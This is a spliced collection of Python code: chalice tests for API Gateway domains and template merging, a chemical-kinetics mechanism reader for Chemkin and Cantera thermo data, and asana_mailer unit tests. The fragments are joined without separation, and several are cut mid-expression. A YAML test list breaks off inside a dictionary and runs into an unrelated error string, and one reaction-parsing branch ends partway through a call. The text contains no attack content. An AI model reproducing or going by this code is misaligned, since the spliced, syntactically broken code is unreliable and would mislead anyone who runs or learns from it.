'Stage': {'Ref': 'RestAPI.Stage'},
'BasePath': '(none)',
}
}
def test_can_generate_domain_for_regional_endpoint(self, sample_app):
config = Config.create(
chalice_app=sample_app,
project_dir='.',
api_gateway_stage='api',
api_gateway_endpoint_type='REGIONAL',
api_gateway_custom_domain={
"certificate_arn": "my_cert_arn",
"domain_name": "example.com",
}
)
template = self.generate_template(config)
domain = template['Resources']['ApiGatewayCustomDomain']
mapping = template['Resources']['ApiGatewayCustomDomainMapping']
assert domain == {
'Type': 'AWS::ApiGateway::DomainName',
'Properties': {
'RegionalCertificateArn': 'my_cert_arn',
'DomainName': 'example.com',
'EndpointConfiguration': {
'Types': ['REGIONAL']
}
}
}
assert mapping == {
'Type': 'AWS::ApiGateway::BasePathMapping',
'Properties': {
'DomainName': {'Ref': 'ApiGatewayCustomDomain'},
'RestApiId': {'Ref': 'RestAPI'},
'Stage': {'Ref': 'RestAPI.Stage'},
'BasePath': '(none)',
}
}
def test_can_generate_domain_for_ws_endpoint(self, sample_websocket_app):
config = Config.create(
chalice_app=sample_websocket_app,
project_dir='.',
api_gateway_stage='api',
websocket_api_custom_domain={
"certificate_arn": "my_cert_arn",
"domain_name": "example.com",
'tags': {'foo': 'bar', 'bar': 'baz'},
}
)
template = self.generate_template(config)
domain = template['Resources']['WebsocketApiCustomDomain']
mapping = template['Resources']['WebsocketApiCustomDomainMapping']
assert domain == {
'Type': 'AWS::ApiGatewayV2::DomainName',
'Properties': {
'DomainName': 'example.com',
'DomainNameConfigurations': [
{'CertificateArn': 'my_cert_arn',
'EndpointType': 'REGIONAL'},
],
'Tags': {
'foo': 'bar',
'bar': 'baz'
},
}
}
assert mapping == {
'Type': 'AWS::ApiGatewayV2::ApiMapping',
'Properties': {
'DomainName': {'Ref': 'WebsocketApiCustomDomain'},
'ApiId': {'Ref': 'WebsocketAPI'},
'Stage': {'Ref': 'WebsocketAPIStage'},
'ApiMappingKey': '(none)',
}
}
class TestTemplateDeepMerger(object):
def test_can_merge_without_changing_identity(self):
merger = package.TemplateDeepMerger()
src = {}
dst = {}
result = merger.merge(src, dst)
assert result is not src
assert result is not dst
assert src is not dst
def test_does_not_mutate(self):
merger = package.TemplateDeepMerger()
src = {'foo': 'bar'}
dst = {'baz': 'buz'}
merger.merge(src, dst)
assert src == {'foo': 'bar'}
assert dst == {'baz': 'buz'}
def test_can_add_element(self):
merger = package.TemplateDeepMerger()
src = {'foo': 'bar'}
dst = {'baz': 'buz'}
result = merger.merge(src, dst)
assert result == {
'foo': 'bar',
'baz': 'buz',
}
def test_can_replace_element(self):
merger = package.TemplateDeepMerger()
src = {'foo': 'bar'}
dst = {'foo': 'buz'}
result = merger.merge(src, dst)
assert result == {
'foo': 'bar',
}
def test_can_merge_list(self):
merger = package.TemplateDeepMerger()
src = {'foo': [1, 2, 3]}
dst = {}
result = merger.merge(src, dst)
assert result == {
'foo': [1, 2, 3],
}
def test_can_merge_nested_elements(self):
merger = package.TemplateDeepMerger()
src = {
'foo': {
'bar': 'baz',
},
}
dst = {
'foo': {
'qux': 'quack',
},
}
result = merger.merge(src, dst)
assert result == {
'foo': {
'bar': 'baz',
'qux': 'quack',
}
}
def test_can_merge_nested_list(self):
merger = package.TemplateDeepMerger()
src = {
'foo': {
'bar': 'baz',
},
}
dst = {
'foo': {
'qux': [1, 2, 3, 4],
},
}
result = merger.merge(src, dst)
assert result == {
'foo': {
'bar': 'baz',
'qux': [1, 2, 3, 4],
}
}
def test_list_elements_are_replaced(self):
merger = package.TemplateDeepMerger()
src = {
'list': [{'foo': 'bar'}],
}
dst = {
'list': [{'foo': 'buz'}],
}
result = merger.merge(src, dst)
assert result == {
'list': [{'foo': 'bar'}],
}
def test_merge_can_change_type(self):
merger = package.TemplateDeepMerger()
src = {
'key': 'foo',
}
dst = {
'key': 1,
}
result = merger.merge(src, dst)
assert result == {
'key': 'foo'
}
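# Illustrative sketch (not chalice's actual TemplateDeepMerger): a merge
# with the semantics exercised above -- dicts merge recursively, the src
# value wins on conflicts, lists and scalars are replaced wholesale, and
# neither input is mutated.
def deep_merge(src, dst):
    if isinstance(src, dict) and isinstance(dst, dict):
        merged = dict(dst)
        for key, value in src.items():
            merged[key] = deep_merge(value, dst.get(key))
        return merged
    # Lists and scalars from src replace whatever dst held.
    return src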
@pytest.mark.parametrize('filename,is_yaml', [
('extras.yaml', True),
('extras.YAML', True),
('extras.yml', True),
('extras.YML', True),
('extras.foo.yml', True),
('extras', False),
('extras.json', False),
('extras.yaml.json', False),
('foo/bar/extras.yaml', True),
('foo/bar/extras.YAML', True),
])
def test_is_yaml_template(filename, is_yaml):
assert package.YAMLTemplateSerializer.is_yaml_template(filename) == is_yaml
@pytest.mark.parametrize('yaml_contents,expected', [
('foo: bar', {'foo': 'bar'}),
('foo: !Ref bar', {'foo': {'Ref': 'bar'}}),
('foo: !GetAtt Bar.Baz', {'foo': {'Fn::GetAtt': ['Bar', 'Baz']}}),
('foo: !FooBar [!Baz YetAnother, "hello"]',
{'foo': {'Fn::FooBar': [{'Fn::Baz': 'YetAnother'}, 'hello']}}),
('foo: !SomeTag {"a": "1"}', {'foo': {'Fn::SomeTag': {'a':
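# Illustrative sketch (assumes PyYAML; not chalice's YAMLTemplateSerializer):
# the short-form CloudFormation tags above can be parsed by registering a
# multi-constructor that rewrites '!Ref x' to {'Ref': x} and any other
# '!Tag v' to {'Fn::Tag': v}, splitting '!GetAtt A.B' on the first dot.
import yaml

def _cfn_tag(loader, tag_suffix, node):
    if tag_suffix == 'Ref':
        return {'Ref': loader.construct_scalar(node)}
    key = 'Fn::%s' % tag_suffix
    if isinstance(node, yaml.ScalarNode):
        value = loader.construct_scalar(node)
        if tag_suffix == 'GetAtt':
            value = value.split('.', 1)
        return {key: value}
    if isinstance(node, yaml.SequenceNode):
        return {key: loader.construct_sequence(node, deep=True)}
    return {key: loader.construct_mapping(node, deep=True)}

# Note this registers the constructor globally on SafeLoader.
yaml.SafeLoader.add_multi_constructor('!', _cfn_tag)
# e.g. yaml.safe_load('foo: !GetAtt Bar.Baz')
#      -> {'foo': {'Fn::GetAtt': ['Bar', 'Baz']}}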
species missing \n'
'data. Either specify file, or ensure complete data in\n'
'mechanism file with THERMO option.')
sys.exit(1)
# Check for missing thermo data again
missing_mw = [spec.name for spec in specs if not spec.mw]
if missing_mw:
logger = logging.getLogger(__name__)
logger.error('Missing thermo data for ' + ', '.join(missing_mw))
sys.exit(1)
# determine reaction type enums
for reac in reacs:
reac.finalize(len(specs))
for spec in specs:
spec.finalize()
if sort_type:
reacs = sort_reactions(reacs, sort_type)
return (elems, specs, reacs)
def read_thermo(filename, elems, specs):
"""Read and interpret thermodynamic database for species data.
Reads the thermodynamic file and returns the species thermodynamic
coefficients as well as the species-specific temperature range
values (if given).
Parameters
----------
filename : str
Name of thermo database file.
elems : list of str
List of element names in mechanism.
specs : list of `SpecInfo`
List of species in mechanism.
Returns
-------
None
"""
# choose our element names to enable comparison between Chemkin & Cantera
elem_name_map = {e.lower(): e for e in elem_wt}
with open(filename, 'r') as file:
# loop through intro lines
while True:
line = file.readline()
# skip blank or commented lines
if re.search(r'^\s*$', line) or re.search(r'^\s*!', line):
continue
# skip 'thermo' at beginning
if 'thermo' in line.lower():
break
# next line either has common temperature ranges or first species
last_line = file.tell()
line = file.readline()
line_split = line.split()
if line_split[0][0:1].isdigit():
T_ranges = utils.read_str_num(line)
else:
# no common temperature line given; rewind so the first species
# entry is re-read below
file.seek(last_line)
# now start reading species thermo info
while True:
# first line of species info
line = file.readline()
# don't convert to lowercase, needs to match thermo for Chemkin
# break at end of file (readline returns '', never None) or on 'END'
if not line or line[0:3].lower() == 'end':
break
# skip blank/commented line
if re.search(r'^\s*$', line) or re.search(r'^\s*!', line):
continue
# species name, columns 0:18
spec = line[0:18].strip()
# Apparently, in some cases, notes are in the
# columns of shorter species names, so make
# sure no spaces.
if spec.find(' ') > 0:
spec = spec[0: spec.find(' ')]
# now need to determine if this species is in mechanism
if next((sp for sp in specs if sp.name == spec), None):
sp_ind = next(i for i in range(len(specs))
if specs[i].name == spec
)
else:
# not in mechanism, read next three lines and continue
line = file.readline()
line = file.readline()
line = file.readline()
continue
# set species to the one matched
spec = specs[sp_ind]
# ensure not reading the same species more than once...
if spec.mw:
# already done! skip next three lines
line = file.readline()
line = file.readline()
line = file.readline()
continue
# now get element composition of species, columns 24:44
# each piece of data is 5 characters long (2 for element, 3 for #)
elem_str = utils.split_str(line[24:44], 5)
for e_str in elem_str:
e = e_str[0:2].strip()
# skip if blank
if e == '' or e == '0':
continue
# may need to convert to float first, in case of e.g. "1."
e_num = float(e_str[2:].strip())
e_num = int(e_num)
spec.elem.append([elem_name_map[e.lower()], e_num])
# calculate molecular weight
spec.mw += e_num * elem_wt[e.lower()]
# temperatures for species
T_spec = utils.read_str_num(line[45:74])
T_low = T_spec[0]
T_high = T_spec[1]
if len(T_spec) == 3:
T_com = T_spec[2]
else:
T_com = T_ranges[1]
spec.Trange = [T_low, T_com, T_high]
# second species line
line = file.readline()
coeffs = utils.split_str(line[0:75], 15)
spec.hi[0] = float(coeffs[0])
spec.hi[1] = float(coeffs[1])
spec.hi[2] = float(coeffs[2])
spec.hi[3] = float(coeffs[3])
spec.hi[4] = float(coeffs[4])
# third species line
line = file.readline()
coeffs = utils.split_str(line[0:75], 15)
spec.hi[5] = float(coeffs[0])
spec.hi[6] = float(coeffs[1])
spec.lo[0] = float(coeffs[2])
spec.lo[1] = float(coeffs[3])
spec.lo[2] = float(coeffs[4])
# fourth species line
line = file.readline()
coeffs = utils.split_str(line[0:75], 15)
spec.lo[3] = float(coeffs[0])
spec.lo[4] = float(coeffs[1])
spec.lo[5] = float(coeffs[2])
spec.lo[6] = float(coeffs[3])
# stop reading if all species in mechanism accounted for
if not next((sp for sp in specs if sp.mw == 0.0), None):
break
return None
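# Illustrative sketch (standard NASA-7 polynomial form, not part of the
# original interpreter): once read_thermo has filled spec.lo/spec.hi and
# spec.Trange = [T_low, T_common, T_high], the nondimensional specific
# heat follows from the first five coefficients:
#     cp/R = a1 + a2*T + a3*T**2 + a4*T**3 + a5*T**4
def nasa7_cp_over_R(spec, T):
    # low-range coefficients below the common temperature, high above it
    a = spec.lo if T <= spec.Trange[1] else spec.hi
    return a[0] + T * (a[1] + T * (a[2] + T * (a[3] + T * a[4])))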
def read_mech_ct(filename=None, gas=None, sort_type=None):
"""Read and interpret Cantera-format mechanism file.
Parameters
----------
filename : str
Reaction mechanism filename (e.g. 'mech.cti'). Optional.
gas : `cantera.Solution` object
Existing Cantera Solution object to be used. Optional.
sort_type : :class:`enum_types.reaction_sorting`
If not None, sort the reactions in this mechanism according to the supplied
scheme
Returns
-------
elems : list of str
List of elements in mechanism.
specs : list of `SpecInfo`
List of species in mechanism.
reacs : list of `ReacInfo`
List of reactions in mechanism.
units : str
Units of reactions' Arrhenius coefficients
"""
if not CANTERA_FLAG:
logger = logging.getLogger(__name__)
logger.error('Cantera not installed. Cannot interpret Cantera-format'
' mechanism.')
sys.exit(1)
if filename:
gas = ct.Solution(filename)
elif not gas:
logger = logging.getLogger(__name__)
logger.error('Need either filename or Cantera Solution object.')
sys.exit(1)
# Elements
elems = gas.element_names
for e, wt in zip(elems, gas.atomic_weights):
if e.lower() not in elem_wt:
elem_wt[e.lower()] = wt
# choose our element names to enable comparison between Chemkin & Cantera
elem_name_map = {e.lower(): e for e in elem_wt}
# Species
specs = []
for i, sp in enumerate(gas.species_names):
# Get Species object
species = gas.species(i)
if isinstance(species.thermo, ct.NasaPoly2):
spec = chem.SpecInfo(sp)
elif isinstance(species.thermo, ct.Nasa9PolyMultiTempRegion):
spec = chem.SpecInfoN9(sp)
spec.mw = gas.molecular_weights[i]
# Species elemental composition
for e in species.composition:
spec.elem.append([elem_name_map[e.lower()], int(species.composition[e])])
# Species thermodynamic properties
coeffs = species.thermo.coeffs
if isinstance(species.thermo, ct.NasaPoly2):
spec.Trange = [species.thermo.min_temp, coeffs[0],
species.thermo.max_temp
]
spec.hi = coeffs[1:8]
spec.lo = coeffs[8:15]
elif isinstance(species.thermo, ct.Nasa9PolyMultiTempRegion):
spec.nzones = int(coeffs[0])
spec.lo = np.resize(spec.lo, (spec.nzones, 9))
spec.hi = np.resize(spec.hi, (spec.nzones, 9))
# Set up temperature brackets.
for i in range(0, spec.nzones):
spec.Trange.append(coeffs[int(i*11) + 1])
# Add the upper bound:
if i == spec.nzones-1:
spec.Trange.append(coeffs[int(i*11) + 2])
# Read in the coeffs.
for i in range(0, spec.nzones-1):
spec.lo[i][:] = coeffs[(int(i*11)+3):(int(i*11)+12)]
spec.hi[i][:] = coeffs[(int(i*11)+14):(int(i*11)+23)]
# Fill low range for the last zone as well
spec.lo[int(spec.nzones-1)][:] = coeffs[((spec.nzones-1)*11+3):((spec.nzones-1)*11+12)]
else:
logger = logging.getLogger(__name__)
logger.error('Unsupported thermo form for species ' + sp)
sys.exit(1)
specs.append(spec)
# Reactions
reacs = []
# Cantera internally uses joules/kmol for activation energy
E_fac = act_energy_fact['joules/kmole']
def handle_efficiencies(reac, ct_rxn):
"""Convert a Cantera `cantera.Reaction`'s third-body efficiencies
to pyJac's internal format, and return updated reaction
Parameters
----------
reac : `ReacInfo`
The pyJac reaction to update
ct_rxn : `Reaction` object
Corresponding cantera reaction to pull the third bodies from
Returns
-------
updated_reac: `ReacInfo`
The updated pyjac reaction with appropriate third body efficiencies
"""
# See if a single species acts as the third body (use the ct_rxn
# parameter, not the rxn loop variable from the enclosing scope)
if ct_rxn.default_efficiency == 0.0 \
and len(ct_rxn.efficiencies.keys()) == 1\
and list(ct_rxn.efficiencies.values())[0] == 1\
and reac.pdep:
reac.pdep_sp = list(ct_rxn.efficiencies.keys())[0]
else:
for sp in gas.species_names:
if sp in ct_rxn.efficiencies:
reac.thd_body_eff.append([sp, ct_rxn.efficiencies[sp]])
elif ct_rxn.default_efficiency != 1.0:
reac.thd_body_eff.append([sp, ct_rxn.default_efficiency])
return reac
for rxn in gas.reactions():
if isinstance(rxn, ct.ThreeBodyReaction):
# Instantiate internal reaction based on Cantera Reaction data.
reac = chem.ReacInfo(rxn.reversible,
list(rxn.reactants.keys()),
list(rxn.reactants.values()),
list(rxn.products.keys()),
list(rxn.products.values()),
rxn.rate.pre_exponential_factor,
rxn.rate.temperature_exponent,
rxn.rate.activation_energy * E_fac
)
reac.thd_body = True
reac = handle_efficiencies(reac, rxn)
elif isinstance(rxn, ct.FalloffReaction) and \
not isinstance(rxn, ct.ChemicallyActivatedReaction):
reac = chem.ReacInfo(rxn.reversible,
list(rxn.reactants.keys()),
list(rxn.reactants.values()),
list(rxn.products.keys()),
list(rxn.products.values()),
rxn.high_rate.pre_exponential_factor,
rxn.high_rate.temperature_exponent,
rxn.high_rate.activation_energy * E_fac
)
reac.pdep = True
reac = handle_efficiencies(reac, rxn)
reac.low = [rxn.low_rate.pre_exponential_factor,
rxn.low_rate.temperature_exponent,
rxn.low_rate.activation_energy * E_fac
]
if rxn.falloff.type == 'Troe':
reac.troe = True
reac.troe_par = rxn.falloff.parameters.tolist()
do_warn = False
if reac.troe_par[1] == 0:
reac.troe_par[1] = 1e-30
do_warn = True
if reac.troe_par[2] == 0:
reac.troe_par[2] = 1e-30
do_warn = True
if do_warn:
logger = logging.getLogger(__name__)
logger.warning('Troe parameters in reaction {} modified to avoid'
' division by zero!'.format(len(reacs)))
elif rxn.falloff.type == 'SRI':
reac.sri = True
reac.sri_par = rxn.falloff.parameters.tolist()
elif isinstance(rxn, ct.ChemicallyActivatedReaction):
reac = chem.ReacInfo(rxn.reversible,
list(rxn.reactants.keys()),
list(rxn.reactants.values()),
list(rxn.products.keys()),
list(rxn.products.values()),
rxn.low_rate.pre_exponential_factor,
rxn.low_rate.temperature_exponent,
rxn.low_rate.activation_energy * E_fac
)
reac.pdep = True
reac = handle_efficiencies(reac, rxn)
reac.high = [rxn.high_rate.pre_exponential_factor,
rxn.high_rate.temperature_exponent,
rxn.high_rate.activation_energy * E_fac
]
if rxn.falloff.type == 'Troe':
reac.troe = True
reac.troe_par = rxn.falloff.parameters.tolist()
do_warn = False
if reac.troe_par[1] == 0:
reac.troe_par[1] = 1e-30
do_warn = True
if reac.troe_par[2] == 0:
reac.troe_par[2] = 1e-30
do_warn = True
if do_warn:
logger = logging.getLogger(__name__)
logger.warning('Troe parameters in reaction {} modified to avoid'
' division by zero!'.format(len(reacs)))
elif rxn.falloff.type == 'SRI':
reac.sri = True
reac.sri_par = rxn.falloff.parameters.tolist()
elif isinstance(rxn, ct.PlogReaction):
reac = chem.ReacInfo(rxn.reversible,
# Repository: palantir/asana_mailer
import argparse
import codecs
import datetime
import glob
import os
import os.path
import smtplib
import unittest
import dateutil
import mock
import nose
import requests
import asana_mailer
from requests.exceptions import HTTPError
class AsanaAPITestCase(unittest.TestCase):
@classmethod
def setup_class(cls):
cls.api = asana_mailer.AsanaAPI('api_key')
def test_init(self):
self.assertEqual(type(self).api.api_key, 'api_key')
@mock.patch('json.loads')
@mock.patch('requests.get')
def test_get(self, mock_get_request, mock_json_loads):
api = type(self).api
mock_response = mock_get_request.return_value
mock_response.status_code = requests.codes.ok
with self.assertRaises(AttributeError):
api.get('not_an_endpoint')
with self.assertRaises(KeyError):
api.get('project', {'invalid_path_var': 'invalid'})
auth = ('api_key', '')
# No Path Vars
api.get('project')
mock_get_request.assert_called_once_with('{0}{1}'.format(
api.asana_api_url, api.project_endpoint), params=None, auth=auth)
mock_get_request.reset_mock()
api.get('project', {'project_id': u'123'})
mock_response.json.assert_called_once_with()
mock_response.reset_mock()
api.get('project_tasks', {'project_id': u'123'}, expand='.')
mock_response.json.assert_called_once_with()
mock_get_request.reset_mock()
api.get(
'project_tasks', {'project_id': u'123'}, expand='.',
params={'opt_expand': 'name'})
full_endpoint = api.project_tasks_endpoint.format(
project_id=u'123')
mock_get_request.assert_called_once_with(
'{0}{1}'.format(api.asana_api_url, full_endpoint),
params={'opt_expand': 'name'}, auth=auth)
mock_response.reset_mock()
mock_response.status_code = requests.codes.not_found
mock_response.content = (
'{"errors": [{"message": "404 Not Found"}]}'
)
mock_response.raise_for_status.side_effect = HTTPError()
with self.assertRaises(HTTPError):
api.get('task_stories', {'task_id': u'123'})
# No content should still throw exception
mock_response.content = None
with self.assertRaises(HTTPError):
api.get('task_stories', {'task_id': u'123'})
mock_response.raise_for_status.side_effect = None
mock_json_loads.side_effect = TypeError()
try:
api.get('project', {'project_id': u'123'})
except TypeError:
self.fail(
'Asana.get should handle TypeError during JSON error'
' conversion')
mock_json_loads.side_effect = ValueError()
try:
api.get('project', {'project_id': u'123'})
except ValueError:
self.fail(
'Asana.get should handle ValueError during JSON error'
' conversion')
mock_get_request.assert_has_calls([
mock.call('{}{}'.format(
type(api).asana_api_url,
type(api).project_endpoint.format(project_id=u'123')),
params=None, auth=auth),
mock.call('{}{}'.format(
type(api).asana_api_url,
type(api).project_tasks_endpoint.format(project_id=u'123')),
params={'opt_expand': 'name'}, auth=auth),
mock.call('{}{}'.format(
type(api).asana_api_url,
type(api).task_stories_endpoint.format(task_id=u'123')),
params=None, auth=auth),
], any_order=True)
class ProjectTestCase(unittest.TestCase):
def setUp(self):
self.id = u'123'
self.name = '<NAME>'
self.description = 'Project Description'
self.project = asana_mailer.Project(
self.id, self.name, self.description)
def test_init(self):
self.assertEquals(self.project.id, self.id)
self.assertEquals(self.project.name, self.name)
self.assertEquals(self.project.description, self.description)
self.assertEquals(self.project.sections, [])
self.project = asana_mailer.Project(
self.id, self.name, self.description, ['123'])
self.assertEquals(self.project.sections, ['123'])
@mock.patch('asana_mailer.Project.filter_tasks')
@mock.patch('asana_mailer.Section.create_sections')
def test_create_project(self, mock_create_sections, mock_filter_tasks):
mock_asana = mock.MagicMock()
current_time_utc = datetime.datetime.now(dateutil.tz.tzutc())
now = current_time_utc.isoformat()
project_json = {
u'name': 'My Project',
u'notes': 'My Project Description'
}
project_tasks_json = [
{
'id': u'123', u'name': u'Test Section:',
u'assignee': None, u'completed': False,
u'notes': u'test_description', u'due_on': None,
u'tags': []
},
{
u'id': u'456', u'name': u'More Work',
u'assignee': None,
u'completed': False,
u'notes': u'more_test_description',
u'due_on': None,
u'tags': []
},
]
task_comments_json = (
(
{u'text': u'blah', u'type': u'comment'},
{u'text': u'blah2', u'type': u'not_a_comment'}
),
(
{u'text': u'blah', u'type': 'comment'},
{u'text': u'blah3', u'type': 'comment'}
)
)
all_calls = [project_json, project_tasks_json]
all_calls.extend(task_comments_json)
mock_asana.get.side_effect = all_calls
new_section = asana_mailer.Section(u'Test Section:')
new_tasks = (
asana_mailer.Task(
u'Do Work', u'test_user', True,
dateutil.parser.parse(now), u'test_description',
dateutil.parser.parse(now),
[u'Tag #{}'.format(i) for i in xrange(5)], [
{u'text': u'blah', u'type': u'comment'},
{u'text': u'blah2', u'type': u'not_a_comment'}
]
),
asana_mailer.Task(
u'More Work', None, False, None, u'more_test_description',
None, [], [
{u'text': u'blah', u'type': 'comment'},
{u'text': u'blah3', u'type': 'comment'}
]
)
)
task_comments = {
u'123': [
{u'text': u'blah', u'type': u'comment'},
],
u'456': [
{u'text': u'blah', u'type': 'comment'},
{u'text': u'blah3', u'type': 'comment'}
]
}
new_section.add_tasks(new_tasks)
new_sections = [new_section]
mock_create_sections.return_value = new_sections
# No Filters
new_project = asana_mailer.Project.create_project(
mock_asana, u'123', current_time_utc)
self.assertEquals(new_project.sections, new_sections)
mock_create_sections.assert_called_once_with(
project_tasks_json, task_comments)
mock_filter_tasks.assert_called_once_with(
current_time_utc, section_filters=None, task_filters=None)
# Completed Lookback
mock_create_sections.return_value = new_sections
mock_asana.get.side_effect = all_calls
lookback_hours = 10
new_project = asana_mailer.Project.create_project(
mock_asana, u'123', current_time_utc,
completed_lookback_hours=lookback_hours)
completed_since = (current_time_utc - datetime.timedelta(
hours=lookback_hours)).replace(microsecond=0).isoformat()
mock_asana.get.assert_any_call(
'project_tasks', {'project_id': u'123'}, expand='.',
params={'completed_since': completed_since})
# Section Filters
section_filters = (u'Other Section:',)
mock_filter_tasks.reset_mock()
mock_create_sections.reset_mock()
mock_asana.get.side_effect = all_calls
new_project = asana_mailer.Project.create_project(
mock_asana, u'123', current_time_utc,
section_filters=section_filters)
self.assertEquals(new_project.sections, new_sections)
mock_create_sections.assert_called_once_with(
project_tasks_json, {})
mock_filter_tasks.assert_called_once_with(
current_time_utc, section_filters=section_filters,
task_filters=None)
# Task Filters
mock_filter_tasks.reset_mock()
mock_create_sections.reset_mock()
mock_asana.get.side_effect = all_calls
task_filters = [u'Tag #1']
new_project = asana_mailer.Project.create_project(
mock_asana, u'123', current_time_utc,
task_filters=task_filters)
self.assertEquals(new_project.sections, new_sections)
mock_create_sections.assert_called_once_with(
project_tasks_json, {})
mock_filter_tasks.assert_called_once_with(
current_time_utc, section_filters=None, task_filters=task_filters)
all_calls[-1] = (
{u'text': u'blah', u'type': 'not_a_comment'},
{u'text': u'blah3', u'type': 'not_a_comment'}
)
# Task with no comments
mock_filter_tasks.reset_mock()
mock_create_sections.reset_mock()
mock_asana.get.side_effect = all_calls
new_project = asana_mailer.Project.create_project(
mock_asana, u'123', current_time_utc)
self.assertEquals(new_project.sections, new_sections)
remove_not_comments = dict(task_comments)
del remove_not_comments[u'456']
mock_create_sections.assert_called_once_with(
project_tasks_json, remove_not_comments)
mock_filter_tasks.assert_called_once_with(
current_time_utc, section_filters=None, task_filters=None)
def test_add_section(self):
self.project.add_section('test')
self.assertNotIn('test', self.project.sections)
new_section = asana_mailer.Section('New Section')
self.project.add_section(new_section)
self.assertIn(new_section, self.project.sections)
def test_add_sections(self):
sections = [asana_mailer.Section('One'), asana_mailer.Section('Two')]
self.project.add_sections(sections)
self.assertEquals(self.project.sections, sections)
self.project.sections = []
list_with_non_sections = [1, 2, 3]
list_with_non_sections.extend(sections)
self.project.add_sections(list_with_non_sections)
self.assertEquals(self.project.sections, sections)
def test_filter_tasks(self):
current_time_utc = datetime.datetime.now(dateutil.tz.tzutc())
now = current_time_utc.isoformat()
no_tasks = asana_mailer.Section('No Tasks')
section_with_tasks = asana_mailer.Section('Some Tasks')
incomplete_task_with_tags = asana_mailer.Task(
u'Do Work With Tags', u'test_user', False,
dateutil.parser.parse(now), u'test_description',
dateutil.parser.parse(now),
[u'Tag #{}'.format(i) for i in xrange(5)], [
{u'text': u'blah', u'type': u'comment'},
{u'text': u'blah2', u'type': u'not_a_comment'}
]
)
incomplete_task = asana_mailer.Task(
u'More Work', None, False, None, u'more_test_description',
None, [], [
{u'text': u'blah', u'type': 'comment'},
{u'text': u'blah3', u'type': 'comment'}
]
)
section_with_tasks.add_task(incomplete_task)
self.project.sections = [no_tasks, section_with_tasks]
self.project.filter_tasks(current_time_utc)
self.assertEquals(len(self.project.sections), 1)
self.assertEquals(len(self.project.sections[0].tasks), 1)
# Section Filters
section_filters = ('None of these tasks:',)
self.project.filter_tasks(
current_time_utc, section_filters=section_filters)
self.assertEquals(len(self.project.sections), 0)
# Task Filters
task_filters = frozenset((u'Tag #1',))
section_with_tasks.add_task(incomplete_task_with_tags)
self.project.sections = [no_tasks, section_with_tasks]
self.project.filter_tasks(current_time_utc, task_filters=task_filters)
self.assertEquals(len(self.project.sections), 1)
self.assertEquals(len(self.project.sections[0].tasks), 1)
class SectionTestCase(unittest.TestCase):
def setUp(self):
self.section = asana_mailer.Section('Test Section')
@classmethod
def setup_class(cls):
cls.tasks = [
asana_mailer.Task(
'Task #{}'.format(i), 'test_assignee', False, None,
'test_description', None, [], [])
for i in xrange(5)]
def test_init(self):
self.assertEqual(self.section.name, 'Test Section')
self.assertEqual(self.section.tasks, [])
self.section = asana_mailer.Section('Test Section', [1, 2, 3])
self.assertEqual(self.section.name, 'Test Section')
self.assertEqual(self.section.tasks, [1, 2, 3])
def test_create_sections(self):
now = datetime.datetime.now().isoformat()
project_tasks_json = [
{
'id': u'123', u'name': u'Test Section:',
u'assignee': None, u'completed': False,
u'notes': 'test_description', u'due_on': None,
u'tags': []
},
{
u'id': u'321', u'name': u'Do Work',
u'assignee': {'name': 'test_user'},
u'completed': True,
u'completed_at': now,
u'notes': u'test_description',
u'due_on': now,
u'tags': [{u'name': u'Tag #{}'.format(i)} for i in xrange(5)]
},
{
u'id': u'456', u'name': u'More Work',
u'assignee': None,
u'completed': False,
u'notes': u'more_test_description',
u'due_on': None,
u'tags': []
},
]
task_comments = {
u'123': [
{u'text': u'blah', u'type': u'comment'},
{u'text': u'blah2', u'type': u'comment'}
],
u'321': [
{u'text': u'blah', u'type': 'comment'},
{u'text': u'blah3', u'type': 'comment'}
]
}
sections = asana_mailer.Section.create_sections(
project_tasks_json, task_comments)
self.assertEquals(len(sections), 1)
self.assertEquals(sections[0].name, u'Test Section:')
self.assertEquals(len(sections[0].tasks), 2)
first_task = sections[0].tasks[0]
self.assertEquals(first_task.name, u'Do Work')
self.assertEquals(first_task.assignee, u'test_user')
self.assertEquals(first_task.completed, True)
self.assertEquals(
first_task.completion_time, dateutil.parser.parse(now))
self.assertEquals(first_task.description, u'test_description')
self.assertEquals(first_task.due_date, now)
self.assertEquals(first_task.comments, [
{u'text': u'blah', u'type': 'comment'},
{u'text': u'blah3', u'type': 'comment'}
])
self.assertEquals(
first_task.tags, [u'Tag #{}'.format(i) for i in xrange(5)])
second_task = sections[0].tasks[1]
self.assertIsNone(second_task.assignee)
self.assertEquals(second_task.name, u'More Work')
self.assertFalse(second_task.completed)
self.assertIsNone(second_task.completion_time)
self.assertEquals(second_task.description, u'more_test_description')
self.assertIsNone(second_task.due_date)
self.assertEquals(second_task.tags, [])
project_tasks_json.append(
{u'id': u'654', u'name': u'Section With No Tasks:'})
sections = asana_mailer.Section.create_sections(
project_tasks_json, task_comments)
self.assertEquals(len(sections), 1)
self.assertEquals(len(sections[0].tasks), 2)
project_tasks_json.insert(
0,
{
u'id': u'789', u'name': u'Misc Task', u'assignee': None,
u'completed': False, u'notes': None, u'due_on': None,
u'tags': []
}
)
sections = asana_mailer.Section.create_sections(
project_tasks_json, task_comments)
self.assertEquals(len(sections), 2)
self.assertEquals(sections[-1].name, u'Misc:')
self.assertEquals(len(sections[-1].tasks), 1)
misc_task = sections[-1].tasks[0]
self.assertEquals(misc_task.name, u'Misc Task')
self.assertIsNone(misc_task.assignee)
self.assertFalse(misc_task.completed)
self.assertIsNone(misc_task.description)
self.assertIsNone(misc_task.due_date)
self.assertEquals(misc_task.tags, [])
def test_add_task(self):
self.section.add_task('test')
self.assertNotIn('test', self.section.tasks)
self.section.add_task(type(self).tasks[0])
self.assertIn(type(self).tasks[0], self.section.tasks)
def test_add_tasks(self):
self.section.add_tasks(type(self).tasks)
self.assertEquals(type(self).tasks, self.section.tasks)
self.section.tasks = []
list_with_non_tasks = [1, 2, 3]
list_with_non_tasks.extend(type(self).tasks)
self.section.add_tasks(list_with_non_tasks)
self.assertEquals(type(self).tasks, self.section.tasks)
class FiltersTestCase(unittest.TestCase):
def test_last_comment(self):
self.assertEqual(asana_mailer.last_comment([]), [])
self.assertEqual(asana_mailer.last_comment(None), [])
self.assertEqual(asana_mailer.last_comment([1, 2, 3]), [3])
self.assertEqual(asana_mailer.last_comment([1, 3]), [3])
self.assertEqual(asana_mailer.last_comment([1]), [1])
def test_most_recent_comments(self):
comments = [1, 2, 3]
self.assertEqual(asana_mailer.most_recent_comments(comments, 0), [3])
self.assertEqual(
asana_mailer.most_recent_comments(comments, 4), [1, 2, 3])
self.assertEqual(asana_mailer.most_recent_comments(comments, 1), [3])
self.assertEqual(
asana_mailer.most_recent_comments(comments, 2), [2, 3])
self.assertEqual(
asana_mailer.most_recent_comments(comments, 3), [1, 2, 3])
